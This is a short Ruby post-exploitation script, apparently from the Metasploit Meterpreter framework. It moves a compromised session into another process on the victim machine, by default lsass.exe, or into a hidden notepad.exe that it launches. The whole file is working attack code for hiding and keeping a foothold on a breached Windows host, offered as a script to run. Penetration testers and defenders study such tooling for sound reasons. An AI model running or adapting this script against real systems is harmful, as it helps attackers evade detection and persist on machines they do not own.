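# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#
# Flow: parse the script arguments, report the current server process,
# resolve a target pid (either by name lookup, or by launching a hidden
# host process), then call client.core.migrate on that pid and report
# the process the session ended up in.

# true when -f was given: launch a new process and migrate into it rather
# than migrating into one that is already running.
spawn = false

# Process name taken from the command line; nil means "use the default for
# the selected mode" (lsass.exe for lookup, notepad.exe for spawn).
target = nil

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process" ]
)

opts.parse(args) do |opt, _idx, val|
  case opt
  when "-f"
    spawn = true
  when "-h"
    print_line("")
    print_line("USAGE: run migrate [process name]")
    print_line("EXAMPLE: run migrate explorer.exe")
    print_line(opts.usage)
    raise Rex::Script::Completed
  else
    # Anything that is not a recognised flag is taken as the target process
    # name. NOTE(review): assumes the parser yields bare arguments with the
    # text in `val` -- confirm against Rex::Parser::Arguments#parse.
    target = val
  end
end

server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")

target_pid = nil

if spawn
  # Default host process when no name was given with -f.
  target ||= "notepad.exe"
  print_status("Spawning a #{target} host process...")
  newproc = client.sys.process.execute(target, nil, { 'Hidden' => true })
  target_pid = newproc.pid
  unless target_pid
    print_error("Could not create a process around #{target}")
    raise Rex::Script::Completed
  end
else
  # Default lookup target when no name was given.
  target ||= "lsass.exe"
  print_status("Migrating to #{target}...")

  # Name -> pid lookup; nil when the lookup yields nothing usable.
  target_pid = client.sys.process[target]

  unless target_pid
    # Fall back to a hidden notepad.exe host. The pid is checked here the
    # same way the -f path checks it, so a failed launch cannot reach
    # migrate with a nil pid.
    print_error("Could not access the target process")
    print_status("Spawning a notepad.exe host process...")
    note = client.sys.process.execute('notepad.exe', nil, { 'Hidden' => true })
    target_pid = note.pid
    unless target_pid
      print_error("Could not create a process around notepad.exe")
      raise Rex::Script::Completed
    end
  end
end

# Do the migration, then re-open the server handle to report the new host.
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)

server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")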